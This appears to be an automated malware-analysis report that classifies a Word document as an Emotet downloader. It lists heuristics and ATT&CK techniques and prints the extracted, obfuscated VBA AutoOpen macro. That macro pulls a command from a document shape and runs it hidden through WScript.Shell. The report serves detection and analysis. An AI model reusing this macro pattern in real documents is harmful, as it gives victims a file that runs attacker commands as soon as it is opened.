Verdict: MALICIOUS
Risk Score: 232

Malware Insights
MITRE ATT&CK:
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function that attempts to execute a heavily obfuscated command. This command uses cmd.exe to construct and run a series of commands that appear to download and execute a second-stage payload from various URLs. The ClamAV detection and heuristic firings strongly indicate this is a downloader, likely belonging to the Emotet family.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6765661-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6765661-0
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `End Select Set bYFnNGn = GetObject(cWPwwLaa + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + CwdIRZsX) On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5778 bytes |

SHA-256: f8d0986b1070047fe24ca3c456131b5e17dfcd2bf87e6302956800d166feb6e4

Detection (macros.bas)
- ClamAV: No threats found
- Obfuscation or payload: likely. 97 of 156 identifiers look randomly generated (e.g. 'wQkVJbHTP'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "LjVRCKji"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case loHVWXk
Case 80319159
MDUABHfM = 187448629
CVZQASNmL = CLng(275924665)
Case 331791321
MIqMd = Oct(RWrscdC)
KXWbEMd = FBMXGCJlY
Case 146736848
GqMKodDv = CDate(GKtvO)
IpPkllc = Int(122502838 * oAFVO)
End Select
On Error Resume Next
Select Case VvPHTWd
Case 144763153
fkSiP = 87466176
OoiNokh = CLng(326979194)
Case 315152335
wvTjh = Oct(MaTomvhjQ)
JHLNpKYL = HWJmlOSL
Case 93543012
hCXwmGD = CDate(YmTGBzHaZ)
iQnXIwZb = Int(20710677 * iaUjTIii)
End Select
On Error Resume Next
Select Case PZIKziZc
Case 228726473
Fossl = 74435552
jZiRfT = CLng(240007200)
Case 167208556
kNOuO = Oct(bBZIiuBNA)
zdHPWuOiT = pfWjG
Case 155320614
vwMOnmGN = CDate(SdhYiMiah)
dKjpwjbHJ = Int(316548968 * qCGJGOnc)
End Select
On Error Resume Next
Select Case qFZzzLFl
Case 135044141
KXjwiKwiR = 120877643
OvBthw = CLng(100586756)
Case 145850035
noOjltQ = Oct(aoWXjNBOw)
CkkKVtQc = YEPOp
Case 98356384
LVJALltzD = CDate(vvihzfj)
MmqdTU = Int(106888528 * jsvKZ)
End Select
Set TGqwi = Shapes("kaqkDoaFLZ")
On Error Resume Next
Select Case UrjiVpTJp
Case 293380988
YTkcmDWLr = 244983583
tnBzhXtA = CLng(272051602)
Case 29122958
qMCQMQP = Oct(jUipORjds)
JYFFj = wdWHvQoDo
Case 323845315
YZWqFvs = CDate(PKwni)
tBvfjWlcE = Int(131089947 * uICTjfAR)
End Select
On Error Resume Next
Select Case tGzADmH
Case 289095135
wOiTItoXW = 242095076
BTtUL = CLng(239711111)
Case 80340396
EQKoEhMEo = Oct(iwXFfzZI)
YhPmKX = UZNip
Case 127218611
LnZlZdm = CDate(pAirolvow)
DYnOpiARw = Int(86208342 * qJzKVLSG)
End Select
qzTsjGpd = "" + ulIhZIwq + ZdsODSi + lQjmun + SZdhlvY + TGqwi.TextFrame.TextRange.Text + Vaahi + BaaNQiOU + rzzVuYU
On Error Resume Next
Select Case OOWHwVjn
Case 253359189
UjmunAVO = 49195321
hrIdd = CLng(151925004)
Case 305787287
XMfooml = Oct(EuHaknG)
aDMbRn = cPHGXGt
Case 196377167
aCQZBjv = CDate(JNvaGjYtl)
CaKTMjlCZ = Int(215156917 * OULQjziX)
End Select
On Error Resume Next
Select Case cFUNPr
Case 292336212
sPnttWKIp = 316472857
tqhmi = CLng(242063039)
Case 124226854
hoCSP = Oct(ASnOwK)
ziMMUZEi = ivkpEduSm
Case 189118066
lKCpzXcsD = CDate(utlLvLV)
OLOckGG = Int(225847014 * MXYVcTN)
End Select
Set bYFnNGn = GetObject(cWPwwLaa + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + CwdIRZsX)
On Error Resume Next
Select Case daWziZi
Case 37157448
jFQdf = 206102797
LQjZM = CLng(148568060)
Case 301475058
wCMKTh = Oct(IlvaJa)
XZtzA = qvCHUwVZO
Case 333017088
GjKCf = CDate(XmUUzf)
EVbHtGfN = Int(146057317 * VBzFpXLmt)
End Select
On Error Resume Next
Select Case UojsazLE
Case 269794384
WvoYYRFIJ = 197875701
JztSMR = CLng(2879560)
Case 29186304
MMaRYICAl = Oct(qpUBU)
nMHlktn = ZLrpZOi
Case 73885492
wlKVX = CDate(PPFWD)
XovZwYFt = Int(121514234 * TYwrN)
End Select
Const jYoqUUvb = 0
On Error Resume Next
Select Case JpqUzziu
Case 86553219
dzXik = 166716905
UBXEjUDQz = CLng(229270740)
Case 216542361
QmSVwNqw = Oct(FhRlvbp)
rQYTKaYZ = dVmDzOBJ
Case 323433426
KbYRtc = CDate(PTGTls)
jHSIRF = Int(75671177 * wQkVJbHTP)
End Select
On Error Resume Next
Select Case BstlHSX
Case 151439652
GzOaKRHX = 84143915
EcXFq = CLng(266147210)
Case 284879004
cPSjI = Oct(BHpdhdp)
TJfoVCi = VDvwl
Case 3486801
mDwPSvH = CDate(XonYCc)
piOaJNZ = Int(10445919 * oVauOo)
End Select
bYFnNGn.Run@ qzTsjGpd, jYoqUUvb
On Error Resume Next
Select Case BmKuAD
Case 342328610
dfKMpXH = 255171770
MwqZXiH = CLng(12070412)
Case 340652590
KrrRtvwA = Oct(RBUJCHwTM)
kjwiPj = iriDDsARp
Case 239374218
NRRsXPVZ = CDate(poRYPuoOF)
JcluQE = Int(143011697 * NJUrMXMF)
End Select
On Error Resume Next
Select Case fkwCcYuE
Case 49725432
EaQLO = 210776950
dJJPQudYf = CLng(247932713)
Case 173506905
lbCKp = Oct(rwJhaz)
ocsLjZ = wWWvwT
Case 103326796
SdwnUuVcB = CDate(auXhjv)
KwbSlNzM = Int(92550687 * PFHOWB)
End Select
End Sub